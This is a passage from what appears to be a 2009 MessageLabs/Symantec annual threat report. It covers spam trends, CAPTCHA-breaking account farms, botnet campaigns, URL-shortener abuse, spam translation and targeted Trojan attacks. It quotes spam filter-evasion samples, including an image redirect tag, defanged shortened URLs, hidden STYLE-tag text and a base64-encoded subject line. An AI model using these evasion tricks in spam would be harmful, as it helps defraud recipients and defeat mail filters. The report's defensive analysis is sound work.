Figure 10: Spam emails with mixed-up Thanksgiving and Christmas themes
Ultimately, these spammers are unlikely to care about such overlap; perhaps the use of both
Thanksgiving and Christmas themes in the same emails doubled their chances of catching
people’s attention. MessageLabs Intelligence identified significant numbers of spam mes-
sages related to Thanksgiving, accounting for approximately 2% of all spam by the end of
November, which was equivalent to more than two billion Thanksgiving-themed spam emails
were in circulation globally each day.
Some particularly keen spammers had already turned their attention to 2010 St. Valentine’s
Day, sending romantic themed emails more than three months in advance. Again sent from
the Cutwail and Rustock botnets, these spam messages relate to pharmaceutical and medi-
cal spam, often linked to the ubiquitous Canadian Pharmacy.

3.4. Spam and the Importance of CAPTCHAs

CAPTCHAs (Completely Automated Public Turing test to tell Computer and Humans Apart),
the visual or audio “puzzles” that are important anti-spam features on many websites,
became very much top of mind for bad guys towards the end of 2008 as CAPTCHA-breaking
tools were readily traded in the underground economy. The ability for these tools to be able
to break a CAPTCHA meant that cyber criminals were able to create large numbers of real
accounts for webmail, instant messaging and social networking websites. These accounts
would subsequently be used to send spam messages, or host fake profiles that would also
be used for hosting spam content and in other social engineering attacks and drive-by
installs of web-based malware and rogue security software.
In the financial climate at the time, the apparent opportunity to raise capital from a small
investment may have seemed an attractive proposition for those who may have been finding
it difficult to obtain credit by traditional means.
As an alternative approach to breaking CAPTCHAs in this way, there are also businesses in
countries like India that specialize in providing real people the ability to create real ac-
counts on major webmail services on a 24-hour basis. Often advertized as a data processing
job, each worker can be expected to receive approximately two to three dollars per 1,000
accounts created, accounts which are then sold on to the spammers for around $30 to $40.
The days for the traditional approach to CAPTCHAs may be well and truly numbered as some
major sites are already investigating alternatives to them.. In some cases large libraries
of photographic images have been experimented with, in which the user must be able
to analyze or interact with the image in such a way that would be very challenging for a
computer program.
3.4.1. CAPTCHA Technology Will Improve in 2010
As this happens and spammers have a more difficult time breaking CAPTCHA codes through
automated processes, spammers in emerging economies will devise a means to use real
people to manually generate new accounts for spamming, thereby attempting to bypass the
improved technology. MessageLabs Intelligence estimates that the individuals employed to
manually create these accounts will be paid less than 10% of the cost to the spammers, with
the account-farmers charging U.S. $30-40 per 1,000 accounts.

16

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

3.5. Spam Tactics Including Free Services, Image Spam and Shortened
URLs
MessageLabs Intelligence recorded a further rise in spam levels during the first half of 2009,
during April and May when much of this increase was attributed to spam with very little
content other than a subject line and a valid hyperlink or an image.

Figure 11: Spam linked to free social networking profiles

In many cases these hyperlinks pointed to a different active profile on one of a number
of major social networking environments. These profiles appeared to have been created
using random names, perhaps with automated CAPTCHA-breaking tools. The benefit to the
spammers of using such accounts is that the emails are sent from valid accounts on major
free-webmail hosting providers, which in turn means that the headers were correct for the
domains from which each message originated. The emails were not being spoofed, as was
often the case for these types of domains in the past. Techniques to check the validity of
these headers are ineffective as anti-spam countermeasures, as all they will establish is that
the sender is genuine and not spoofed or sent from a botnet.
3.5.1. Donbot Spam Turns to Social Networks
On 18 November 2009, MessageLabs Intelligence tracked a huge jump in the number of
spam emails that contained links to a popular micro-blogging website. This trend has
typically been very low, averaging less than 1% of all spam traffic, but on 18 November it
jumped to more than 4% of all spam. This new surge was entirely from the Donbot botnet.
9%
8%
7%
6%
5%
4%
3%
2%
1%
0%
16 Nov

17 Nov

18 Nov

19 Nov

20 Nov

21 Nov

22 Nov

23 Nov

24 Nov

Figure 12: Trend of Donbot spam containing hyperlinks to social profiles

The intention of these emails seemed to be to attract people to a series of “get rich by
working at home” schemes, where the individual is encouraged to pay an initial fee for a trial
and then sit back and watch the cash come in.
Although blocked as spam, this new run combined a number of techniques in an attempt
to evade basic spam filters. Firstly, the body of the email is comprised simply of an image,

17

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

giving the appearance of a newspaper article, to try and get past text-based signatures.

Figure 13: Donbot image spam with hyperlinks to micro-blogging profiles

Secondly, the main image in the emails was linked to profile pages on a popular micro-
blogging service, again in an attempt to bypass hyperlink-based signatures. As a legitimate
reputable website, it would be very difficult to block without intercepting large volumes of
perfectly innocent emails as well.
The hyperlinks to the profile pages are to a recent posting from that account containing a
short message encouraging visitors to follow a further hyperlink contained in the posting.

Figure 14: Micro-blogging profile referenced in Donbot spam

This Donbot spam campaign came to an abrupt halt at midnight (GMT) on 23 November,
as the botnet ceased sending the spam emails altogether. Lasting for five days, the spam
campaign peaked at around 8.4% of all spam on 22 November, but averaged 5% for the
duration of the campaign, projected to account for more than three billion spam emails per
day.
Further analysis revealed that there were only three different images hosted on a small
number of social networking profiles and multimedia file-sharing sites. However, more than
3,000 individual accounts had been used in this campaign, which seemed to be a mixture of
hijacked accounts that were quite old, and had genuine-looking updates, and false accounts
that had been established purely for the purpose of spamming, which contained only
spam-like links. These were likely to have been created using CAPTCHA-breaking tools or by
employing sweat-shops of real people in less wealthy economic conditions to create them
manually to be sold on to the spammers.
This scam has also been observed using hijacked accounts from other popular social
networking websites, where the scammers have used a legitimate account that did not
belong to them in order to post notifications to the owner’s circle of friends. These updates
contained links to the same accounts on a popular micro-blogging service that were already
used in the spam emails intercepted previously.
The websites referenced in the hyperlinks are seemingly rather hastily assembled with much
of the site content not functional, for example in the screenshot below, the links to the menu
items across the top of the page were inactive as were the social bookmarking links further
down. These websites seem to be clearly targeting people seeking alternative sources of
income online, which may seem particularly attractive to some people during the harsh
economic climate of 2009.

18

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

Figure 15: Spam website linked from social profiles

Furthermore, when accessing some of the content elsewhere on the websites, the visitor is
redirected to other spam and scam websites or asked to complete their personal contact
information in order to receive the money-making toolkits. Interestingly, the websites
include several positive comments after the articles, but the links to post comments are
inactive, which is another indicator that these websites should be regarded with a degree of
suspicion.
MessageLabs Intelligence expects a return to this type of spam activity in 2010, if not before
the end of 2009.
3.5.2. Taking Stock of Image Spam
In January 2009, MessageLabs Intelligence tracked a return to stock-spam, levels of which
had been almost non-existent since the indictment of notorious spammer Alan Ralsky, in
early 2008.
On 24 November, Alan Ralsky, the self-proclaimed “Godfather of Spam” and three other men
were sentenced to prison terms for their roles in an email stock fraud scheme. According to
anti-spam group Spamhaus, Ralsky had been spamming since 1997, using many different
aliases and tens of thousands of compromised computers to relay his spam. The sentences,
ranged from 32 to 51 months in prison, including a penalty of U.S. $500,000.
It seemed that another criminal group had sought to emulate Ralsky’s earlier success with
the return of stock-spam in 2009, with emails containing image attachments, such as .GIF or
.JPG that were a graphical rendering of the text of the spam message. Not since 2007 were
spam emails relating to penny stocks being intercepted in such large volumes. Moreover,
many of these emails were being sent from legitimate accounts on some of the major, free
webmail hosting providers. These accounts were seemingly being created with CAPTCHA-
breaking tools.

19

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

Figure 16: Typical example of image spam from early 2009

In figure 16, the message includes the following URL in order to present the image in the
message:
<img src=”http://[redux].com/log?srvc=xmibx &goto=http://
[redux].cn/10.gif” border=0 alt=”Qbjwjvuda Click Here!”>
We can follow the path of this redirection to another site, which in turn is redirected again,
before the image is finally delivered. The domain name of the original hyperlink is preserved
as the image is downloaded, and is passed in the URL as a parameter, for example:
http://[redirected ip address]/10.gif?[original domain]
It is believed that this may be used by the spammers to track the usage of each domain,
perhaps in order to identify its longevity and effectiveness over time.
The use of images that contained text rendered into a graphic was a popular tactic to evade
traditional spam filtering techniques that would attempt to analyze the patterns of words
in the body of the email text, but could not easily work on an image. In a resurgence during
2009, these images were now being hosted on freely available websites and hyperlinks to
them were being included in spam emails, often using redirection links from other reputable
sites in order to hide the true location of the image hosting website.
40%
% spam with remotely hosted image
35%
% spam with image attached
30%

25%

20%

15%

10%

5%

0%
Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov
2009

Figure 17: Chart showing increase of image spam as % of spam over time in 2009

20

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

Image spam activity peaked on 5 April when 56.4% of spam was identified as image spam,
but the average proportion of image spam for all of 2009 was 28.2%.
By June 2009, image spam was again being attached to spam messages, rather than being
hosted remotely and displayed as HTML images. Some of these included background noise
patterns that had been generated in an automated fashion to obfuscate the content from
anti-spam analysis. Almost certainly sent from a botnet, the emails often contained no
hyperlinks, with the spammers’ website names frequently included in the content of the
images.
The technique of using reputable domains in spam emails is employed by spammers in a
bid to evade spam filters that examine the domains of the hyperlinks contained in the email,
and used the knowledge about these domains to make a judgment about the nature of that
email and the likelihood that it contains a spam message.
3.5.3. URL-Shortened Spam and Reputable Domains
During 2009, with the explosion of social networking and micro-blogging services, there
has been a plethora of URL-shortening services available on the Internet, and many do not
require users to register or complete a CAPTCHA in order to use their services.
The use of these free URL redirection services which turn lengthy web addresses into
shortened URLs became increasingly popular with spammers as the newly shortened
URLs also helped to disguise the real destination and help divert any concerns regarding
legitimacy of the link using these reputable domains. URL-shortening services hide the true
website hyperlink by replacing it with the domain of the service followed by a unique key
that redirects the visitor to the original link. Spammers were also able to take advantage of
these free redirection services by including the shortened URL in their spam messages. As
these shortened hyperlinks used reputable legitimate domains, it was harder for traditional
anti-spam filters to identify the messages as spam based on the reputation of the URL
domains.
By mid-2009, many of these services were being abused by spammers operating on many of
the social network and micro-blogging services using fake profiles and posting comments
that link to these redirection domains.
Here are some examples:
hXXp://is.gd/yvzs#cctrtfcphhww.mail.[redux].com
hXXp://is.gd/ymyl#rzsuuyhvcwr.mail.[redux].com
hXXp://is.gd/ymyl#rzsuuyhvcwr.mail.[redux].com
hXXp://tinyurl.com/2572434838#qcgkehbkfuxrn.[redux].com.tw
hXXp://www.x.se/[redux]#slidesilvana
hXXp://tr.im/dv0b#kbdhfhdbl[redux]vnmatq.yuk4a
hXXp://pr.mail.[redux].co.jp/gyao
Note the use of the HTML anchor tag (‘#’) in some of these hyperlinks. This symbol has a
legitimate purpose in HTML hyperlinks, but the spammers take advantage of this fact and
append anchor tags containing random strings of letters and numbers. This approach is in-
tended to confuse anti-spam technology that may rely on fingerprinting the entire URL. The
anchor tag is ignored by the URL shortening service and used here purely for obfuscation. In
total, 1% of shortened URL spam in 2009 used this technique and is seen very occasionally.

21

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

Figure 18: Example of spam with shortened URL

short URL % of shortened

Rank service URL spam
1 bit.ly 12.2%
2 o.ly 9.9%
3 aafter.us 9.3%
4 tcbp.net 8.9%
5 jtty.com 6.8%
6 tlink.me 6.7%
7 myurl.in 6.0%
8 snurl.com 5.7%
9 is.gd 5.7%
10 sturly.com 5.5%
Figure 19: Table of top-10 URL shortened services used
Furthermore, 77% of URL-shortened spam relied on just 10 different URL-shortening
services. Recipients of these hyperlinks would be unaware of their true location just by
looking at them and would need to follow the links by clicking on them in order to determine
their true location.
URL-shortening is frequently used on social networking and micro-blogging sites and is
popular because of the inherent trust relationships that exist between users, which is why it
is considered acceptable to click on a link from a trusted friend.
10%

9.3%
9%

8%

7%

6%

5%

4%

3%

2%

1%

0%
4-Oct
2-Aug

9-Aug

13-Sep

20-Sep

27-Sep

11-Oct

18-Oct

25-Oct
12-Apr

19-Apr

26-Apr

12-Jul

19-Jul

26-Jul
14-Jun

21-Jun

28-Jun

16-Aug

23-Aug

30-Aug

1-Nov

8-Nov
3-May

6-Sep
5-Apr

5-Jul

15-Nov
7-Jun
10-May

17-May

24-May

31-May

Figure 20: URL shortened spam in 2009

22

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

By 28 July, 9.3% of all spam included a shortened URL domain, equivalent to more than 10
billion spam messages per day worldwide. The Donbot botnet was responsible for sending
approximately five billion spam messages each day, and was one of the main culprits for
using this technique. Most of these spam runs related to casino, bingo or gambling spam.
By the end of 2009 this technique had become less commonplace, but other major botnets
had also given it a go, including Cutwail, Rustock and Xarvester.
Many of the more popular URL-shortening services were quick to respond in stamping out
this abuse by withdrawing the abused links, but many of the newer, less familiar services
were less responsive and many of these URLs could remain active for several days after the
initial spam runs.
3.5.4. Obfuscation and Information Hiding
Obfuscation is often used inside spam messages to improve their chances of better evad-
ing spam filters, and in 2009 many examples included the use of HTML style tags to hide
random text intended to confuse anti-spam filters. For example:
<STYLE>Ysavu ujkuibito Yna wuc</STYLE>
The text between the HTML STYLE tags is not actually displayed in the email message and
remains hidden from view, but some traditional and perhaps naïve anti-spam filters may be
thrown off the scent by the use of this simple technique. This method has also been used to
break up hyperlink domains, for example:
www.spammerdomain<STYLE>Zowjqs otuwaqito Fodi ahqwu</STYLE>name.cn
In the example above, the text in between the HTML style tags will not be displayed, but
some anti-spam tools may simply strip out HTML tags before performing their analysis and
become confused and may think the domain in this example is ahqwh.name.cn rather
than www.spammerdomainname.cn.

3.6. The Language of Spam

The proportion of spam written in English was higher in 2009 than in the previous year, with
Russian language spam being a very prominent feature during the summer of 2008, but not
nearly as significant in 2009.

Unknown French 0.65%

2.4%
Portuguese 0.55%

Russian 0.53%

German 0.28%

Chinese 0.10%
95.3%
Japanese 0.05%
English
Spanish 0.05%

Italian 0.04%

other known language 0.02%

Figure 21: Breakdown of global spam by language

After English, the most common languages for spam are French, Portuguese, Russian and
German, in that order.
German is still a very common language for spam and large bursts of German spam are
often observed over the normal German-language spam background traffic. Portuguese-
language spam is becoming more common, particularly in Brazil. Very occasionally there will
be a big wave of Italian-language spam. Chinese and Japanese spam does feature in global
spam, but not as much as in those countries themselves.
The use of the KOI8-R Russian language character set was identified in approximately 1 in

23

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

147 spam emails each day during 2009, 2% of which were actually in English, but where the
email subjects were encoded using the Russian character set in order to hide the English
language content. The Russian character set is typically used to encode the Cyrillic alphabet,
however, in these examples it is only used to encode the 26-letter English language Roman
alphabet, such as in the following example:
Subject: Real manliness is renewable at any age √ make sure
yourself.
When viewing the original source code of the email message from the previous example, the
subject is actually comprised as follows:
Subject: =?koi8-r?B?QmVpbmcgd2VhbHRoeSBpcyBhYm91dCBiZWluZyBoZWF
sdGh5IJYgbGVh?==?koi8-r?B?cm4gaG93Lg==?=
Here, the Russian character set is being used by the spammers to hide the true meaning
behind the message. The subject is decoded by the email program and displayed correctly
in English. This unnecessary use of another character set to encode the English language
subject is purely to hide the true content of the subject of the message, and a technique
sometimes used by spammers to avoid content filters that do not decode the character set
in their analysis.
Many examples of this type of spam were sent from the Cutwail botnet. And included some
examples of the Bredolab Trojan in .ZIP file attachments to spam emails purporting to be
originate from major couriers, and contained subjects referring to postal tracking numbers.
There is more information on Bredolab later in this report.
Other non-Latin character sets, such as Japanese and Chinese do not appear to have been
used by spammers in the same way however.
3.6.1. Automated Spam Translation
During 2009, spam levels in countries where English was not the primary language had
increased significantly. Levels in Germany and The Netherlands increased by 13% since the
beginning of the year, with spam now accounting for in excess of 95% of all emails. Mes-
sageLabs Intelligence uncovered one of the tactics that contributed to this increase, the use
of automated translation services to enable multiple language spam runs.
Globally, the majority of spam was in English, and around 5%, (1 in 20) spam messages, was
in a non-English language.
To evaluate the language for recipients in a particular country, MessageLabs Intelligence
analyzed spam blocked for each client country where there were a sufficiently large range of
domains available.
In figure 22, it can be seen that for 2009, Brazil had the highest percentage of spam that
was in the local language, Portuguese (40%), followed by Italy (35%), and China (19%).
Brazil (18%) also has the lowest percentage of English-language spam.
The Baltic states of Sweden, Finland, Norway and Denmark had a very low proportion of
spam in their local language, with between 50 and 60% of spam in English. However, South
Africa had a very high proportion of English-language spam (91%), as does Switzerland,
Thailand and India – all had more than 80% of the spam in English.
Taiwan, China, Hong Kong, Singapore, Indonesia had the highest percentage of Chinese-
language spam, especially China and Taiwan, with between 18 and 20% of spam in Chinese.
Interestingly, nearly everywhere received a small volume of Chinese-language spam.

Rank Country Local Language Spam %

1 Brazil Portuguese 40.5%
2 Italy Italian 35.0%
3 China Chinese 18.6%
4 Austria German 18.4%
5 France French 17.6%
6 Germany German 17.0%

24

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

7 Spain Spanish 15.8%

8 Portugal Portuguese 14.9%
9 Belgium French/Dutch/German 13.3%
10 Japan Japanese 7.4%
11 Netherlands Dutch 6.5%
12 Switzerland French/German/Italian 6.5%
13 Denmark Danish 5.8%
14 Sweden Swedish 4.7%
15 Finland Finnish/Swedish 1.4%
16 Norway Norwegian 0.7%
Figure 22: Analysis of spam language by country
On analyzing the proportion of spam in non-English speaking countries, the volume of
English-language spam can often be much less than in predominantly English-speaking
countries, as spammers targeted countries with spam in the local language, rather than
sending all English language spam. For instance, by the end of 2009, 17.0% of all spam in
Germany was in German; in The Netherlands 6.5% of spam was in the Dutch language and
in France, 17.6% was in French. In Japan 7.4% was in Japanese and in China, 18.6% of
spam was in Chinese.
Further analysis of the same spam data from the perspective of the country code top-level
domains (CCTLDs) revealed some further interesting patterns, as seen in figure 23.

Rank CCTLD Local Language Spam %

1 .be French/Dutch/German 9.6%
2 .ch French/German/Italian 9.0%
3 .at German 6.0%
4 .de German 5.9%
5 .fr French 5.5%
6 .br Portuguese 5.3%
7 .pt Portuguese 4.9%
8 .dk Danish 3.9%
9 .it Italian 3.6%
10 .es Spanish 2.9%
11 .nl Dutch 1.3%
12 .cn Chinese 1.1%
13 .jp Japanese 0.8%
14 .se Swedish 0.6%
15 .fi Finnish/Swedish 0.3%
16 .no Norwegian 0.0%
Figure 23: Analysis of spam language by CCTLD
This was actually rather surprising as the expectation had been that CCTLDs would have
received a greater proportion of spam in the local language, but in fact, they generally had a
lower proportion of local language spam, for example:
• In Brazil, .br CCTLDs received 5% spam in Portuguese, but customers with their regis-
tered location as Brazil received 41% of spam in Portuguese;
• In China, .cn CCTLDs received 1% of spam in Chinese, but customers registered in China
received 19% of spam in Chinese;

25

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

• In Germany, .de CCTLDs received 6% of spam in German, but customers registered in

Germany received 18% of spam in German.
So what possible explanation can there be for this? Why would a company based in China be
more likely to receive Chinese spam sent to a .com domain, than to a .cn one? The answer
was actually rather straightforward. This revealed that spammers were actually being more
careful with selecting the domains that they target with a particular language; rather than
simply choosing domains with the TLD for that country, they were researching and targeting
companies known to be based in China, and were more likely to have Chinese-speaking
employees.
Perhaps it would not be a simple task to automate this kind of approach, but investing time
up-front in preparing these target domains for their Chinese spam runs, means that they
could potentially maximize their potential responses. This trend was identical across all of
the countries analyzed.
Moreover, the CCTLDs that were most likely to receive English-language spam were India,
Singapore, Indonesia, Japan and Hong Kong. The CCTLDs least likely to receive English-
language spam were Denmark, Sweden, Finland, Taiwan and Thailand.
The CCTLDs most likely to receive Chinese-language spam were Singapore, Hong Kong, Tai-
wan and Austria. The CCTLDs least likely to receive Chinese-language spam were Portugal,
U.S., Netherlands and Germany.
English was the predominant language for all TLDs analyzed.
Spammers had begun to use templates to engineer this translation “on-the-fly”. As the
spam messages were being composed, they were able to change company names, domain
names and other references as part of the automation process. Initially, the language for
translation was chosen based on the top-level country domain from the email address of
the recipient; for example, an address ending in .fr may be translated into French, and .de
into German. However, the latest research showed that by the end of 2009, spammers were
targeting business domains derived from their knowledge of the location of the organiza-
tion. Based on where this data may be obtained we can only speculate, for example, they
may be using information from the WHOIS registry for each domain, which includes the
country where the domain is registered.

Figure 24: Examples of auto-translated spam

The application of this technique to translate spam emails for different countries into
different languages revealed that spammers were using automated language translation
tools in significant volumes. Automated spam techniques using templates had been used in
the past, for example, using text-based templates to generate spam messages containing
image attachments such as .JPG or .GIF files, where the image contains the text of the spam
message rendered as a bitmap. This technique was still being widely used in 2009 and an
indication of the potential longevity of automated spam translation tools.
Further analysis of automatically translated spam revealed some messages that had been
badly translated and therefore were harder to read for a native speaker, even though they
were meant to be in their local language. In some examples, English words in the original
template remained in the final message without being translated at all.

26

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

Figure 25: Translated spam with original English remaining

The use of free, online translation services had already become a favorite of 419-type
advance-fee fraudsters, enabling them to communicate in languages they were not profi-
cient in speaking. However, it was only during the second half of 2009 that this approach
was adopted by spammers too.

3.6.2. Changing the Lexicon of Stove Spam

There’s more than one way to skin a cat, as the expression goes, and the same holds true
for language translation. In one example, relating to Russian stoves in spam emails, the text
of the original message had been subtly changed in each variation. The message remained
the same, but the subtly different wording was used in each case to alter the translation of
certain words, as can be seen in figure 26. Presumably this is to make it harder for tradi-
tional anti-spam technology to create signatures able to identify and block the messages.

Figure 26: Examples of Russian stove spam, using alternative wording

There were at least six variations of this particular scam, which in itself was not new; but the
use of a lexicon or thesaurus, seemingly in the translation process made it more interesting.

3.6.3. Spam Linked to DDoS Attacks Against Social Networking Websites

In early August 2009, a number of very well-known social networking websites were
reported to be victims of distributed denial of service (DDoS) attacks. The attacks appear
to be linked with a “Joe Job” style spam run against an anti-Russian blogger. A “Joe Job”
is a spam technique that spoofs the From: email address using a real email address (i.e. an
unsuspecting victim) to make it appear as though that person was responsible for the email.

27

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

One such spam run was estimated to account for less than 1% of all spam at that time and
distributed from a currently unclassified botnet. The run was significantly smaller compared
with some of the more recent spam runs, such as the URL-shortening attacks from Donbot.
Although it was believed that this spam run may have contributed to the DDoS attacks
reportedly targeting the social networking websites, it was believed to be unlikely that this
run alone could have caused the reported disruption, suggesting that there was something
else involved. MessageLabs Intelligence believes that a botnet was also used to conduct the
DDoS attack in parallel with the spam runs, utilizing compromised computers under the
botnet’s control in an automated fashion to repeatedly visit pages of the targeted social
networking websites.

3.6.4. Spam Operations Were Dominated by the U.S. Working Day

Research into what time of day you can expect to receive the most spam, depending on your
geographic location, was conducted by MessageLabs Intelligence. Analysis highlighted that
if you were located in the U.S., spam activity peaked at between 9 – 10 a.m. local time, and
trailed off to much lower levels overnight.
Europeans received a steady stream of spam throughout their working day, whilst users in
the Asia-Pacific region started their day with an inbox already full of spam, with only small
amounts trickling in after this point until the evening.
08 09 10 11 12 13 14 15 16 17 Workday

Australia

00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23
Australia Local Time (EST) GMT/UTC +10

08 09 10 11 12 13 14 15 16 17 Workday

UK
00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23
UK Local Time (GMT)

Workday 08 09 10 11 12 13 14 15 16 17

US
00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23
US Local Time East Coast (EST) GMT/UTC -5

Figure 27: Regional spam transmission based on time-of-day

28

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

This profile of activity suggested that spammers were predominantly active during the U.S.
working day, and reflected the fact that the most active spammers were based in the U.S.
(according to Spamhaus ROKSO – add reference). From a direct marketing perspective it is
also likely that this time of day would be when the spammers’ largest target audiences are
online and most likely to respond. Understandably, across all regions, spam levels dropped
significantly on Sundays. For all countries examined (except Japan), spam levels dropped
mid-week, with peak activity periods being Mondays and Fridays.
Further analysis revealed that the source of this spam (based on the originating IP address
of the sender) is very much more evenly distributed across the three main regions:
• 34.8% of spam originated from the Americas (21.4% from South America, 13.4% from
North America);
• 31.6% from Europe;
• 27.8% from Asia.

3.7. Spam predictions for 2010

3.7.1. Spammers Breaking the Rules
As the economy continues to suffer and more people seek to take advantage of the loose
restrictions of the CAN SPAM Act, we’ll see more organizations selling unauthorized e-mail
address lists and more less-than-legitimate marketers spamming those lists.

3.7.2. As Spammers Adapt, Spam Volumes Will Continue to Fluctuate

Since 2007, spam has increased on average by 15%. While this significant growth in spam
e-mail may not be sustainable in the long term, it is clear that spammers are not yet willing
to give up as long an economic motive is present. Spam volumes will continue to fluctuate
in 2010 as spammers continue to adapt to the sophistication of security software, the
intervention of responsible ISPs and government agencies across the globe.

3.7.3. CAPTCHA Technology Will Improve

As this happens and spammers have a more difficult time breaking CAPTCHA codes through
automated processes, spammers in emerging economies will devise a means to use real
people to manually generate new accounts for spamming, thereby attempting to bypass the
improved technology. Symantec estimates that the individuals employed to manually create
these ac-counts will be paid less than 10% of the cost to the spammers, with the account-
farmers charging $30-40 per 1,000 accounts.

3.7.4. Instant Messaging Spam

As cybercriminals exploit new ways to bypass CAPTCHA technologies, instant messenger
(IM) attacks will grow in popularity. IM threats will largely be comprised of unsolicited spam
messages containing malicious links, especially attacks aimed at compromising legitimate
IM accounts. By the end of 2010, Symantec predicts that one in 300 IM messages will con-
tain a URL. Also, in 2010, Symantec predicts that overall, one in 12 hyperlinks will be linked
to a domain known to be used for hosting malware. Thus, one in 12 hyperlinks appearing in
IM messages will contain a domain that has been considered suspicious or malicious. In mid
2009, that level was 1 in 78 hyperlinks.

3.7.5. Non-English Spam Will Increase

As broadband connection penetration continues to grow across the globe, particularly in
developing economies, spam in non-English speaking countries will increase. In some parts
of Europe, Symantec estimates the levels of localized spam will exceed 50% of all spam.

29

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

4. MALWARE: TOP THREATS OF 2009

4.1. Malware Summary
For email-borne malware, the average virus level for 2009 was 1 in 286.4 emails (0.35%)
reflecting a 0.35% decrease on 2008 where levels averaged at 1 in 143.8 emails (0.70%).
The decline can be attributed to the transition to developing more variants (23% increase
in 2009 compared with 2008), but fewer malicious emails per strain (approximately 5,827
malicious emails per strain in 2009 compared to 10,436 emails per strain in 2008).
In 2009, more than 73.1 million malware infected emails were blocked of over 2,500 differ-
ent malware strains. This was an average of more than 5,800 malicious emails per strain for
2009, compared with over 10,400 in 2008. In 2009, the variety of malware has increased as
it has become easier to create, distribute and use malware than in 2008.
Approximately 15.1% of malware intercepted in 2009 comprised of a malicious link
contained in the blocked email, rather than malware in an attachment.

2009 Virus Rate 1 in 112.2 Luxembourg 1 in 119.2 Education 1 in 217.8 1-250

1 in 227.7 251-500
1 in 173.3 China 1 in 147.8 Gov/Public Sector

1 in 286.4 1 in 188.3 Brazil

1 in 199.2 United Kingdom

1 in 166.8 Accom/Catering

1 in 214.2 Marketing/Media
1 in 218.4 501-1000
1 in 254.1 1001-1500
1 in 181.9 1501-2500
Min September: 1 in 399.2 1 in 225.8 Germany 1 in 242.1 Engineering 1 in 244.5 2501+

Max November: 1 in 192.9 Top 5 Geographies Top 5 Verticals By Horizontal

1 in 36.9 1 in 143.8
1 in 84.6
1 in 115.5
1 in 286.4

2005 2006 2007 2008 2009

Annual 2009 (Jan - Nov)

4.2. Themed Malware Attacks: Email Bourne on the Fourth of July

There were a number of malware attacks that made reference to the U.S. Independence Day,
which contained malicious hyperlinks purporting to show a fireworks video of the festivi-
ties. Anyone following this link would have potentially allowed their computer to become a
member of the Waledac botnet.
The vast majority of malware in circulation recently has been designed for the commission
of fraud, theft of personal information or the creation of a botnet. In a recent return to the
destructive malware typical of the last decade, Trojan.Dozer 4 was being dropped onto
an infected computer by a malicious email attachment W32.Dozer, which also included a
version of the 2004 MyDoom email worm, used to send the emails. MyDoom reached a peak
infection rate of 1 in every 12 emails in 2004.
The Trojan was linked5 to a number of distributed denial of service (DDoS) attacks against
websites in the U.S. and South Korea. And aside from its DDoS capabilities, it also seems to
have a more malevolent purpose6, purportedly deleting files and corrupting hard disks on
10 July by overwriting the contents of the files and the master boot record of the hard disk
itself. Infection levels were reportedly low, but the only way to recover from data lost in this
way is to retrieve it from a good, clean backup.
In February, a number of targeted Trojans were identified which included additional SMTP
headers that were forged in an attempt to lend some degree of legitimacy to the email, and
perhaps increase the probability that it would not be recognized as a fake. The additional
headers were taken from real-world examples of earlier, genuine email messages, examples
of which could only originate from the organization in question, and suggested that the
attackers had access to that information in order to then use it in dressing-up subsequent
attacks.

4 http://www.symantec.com/business/security_response/writeup.jsp?docid=2009-070814-5311-
99&tabid=2
5 http://www.symantec.com/connect/blogs/born-4th-july
6 http://www.symantec.com/connect/blogs/trojandozer-kicking-you-while-your-website-down

30

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

4.3. Targeted and Semi-Targeted Attacks

The ultimate aim of a targeted attack is to gain access to sensitive data or internal systems
by targeting specific individuals or companies. They are sent in relatively small volumes
compared with spam and phishing emails, for example, but are one of the most damaging
email threats. Targeted organizations frequently include government departments, military
organizations and suppliers, energy companies, media, NGOs and commercial companies
that trade internationally. In general any large or important organization that possesses
sensitive and valuable data is an attractive target.
The danger of targeted attacks is the stealth deployment of an executable that quietly per-
forms some malicious operation on the recipient’s computer. Sometimes these executables
are attached directly to an email message as an .EXE (which to many would appear suspi-
cious), but increasingly frequently they are hidden within very legitimate looking documents
such as .PDF, .DOC, .XLS, .PPT. The recipient only has to open the attachment and their
computer is compromised.
The message received by the target is usually business related, or related to some news-
worthy event, from a webmail account or with a spoofed From address crafted to appeal to
the target, and in some way gives the impression that the attachment contains important
information, such as current affairs, meetings, legal documents, agreements or contracts.
However, sometimes they can contain general interest material, like funny items or health
advice. Very often the theme of the mail is related to an important topical event, to increase
the chances of grabbing the recipient’s attention. For example, in summer 2008 the topic of
the Beijing Olympics was very popular in targeted attacks.
Depending on the specific nature of the attack, spoofed .gov type email addresses are often
used for social engineering purposes, and free webmail addresses afford ease of use and
virtual anonymity.
On occasion the deception can be so successful that recipients open the attachment, and
then forward the mail to others, which propagates the targeted attack whilst simultaneously
increasing the chances of the attachment being opened, as recipients are more likely to
trust the known sender and not question the email’s contents.
The topic of the G20 summit held in London in April 2009 was the subject of a heightened
number of targeted Trojan attacks during March and April. On 2 April 2009, the G20, the
group of 20 finance ministers and central bank governors, met in London and was the
subject of intense international media focus as well as the subject for a rise in targeted
malware attacks over the previous two months.
On average in 2008 the number of targeted attacks was around 53 per day, rising to around
60 per day in Q1 2009. In the run-up to the G20 summit and the days following, this number
rose to around 100 per day before settling back to around 60 per day since. The average
number of targeted Trojans per day was 48 in 2009.
107
71

65
61

57
56

56

52
49

46
46

46
45

43

41

40
40
38

31

23
Nov 08
Jun 08

Jan 09

Jun 09
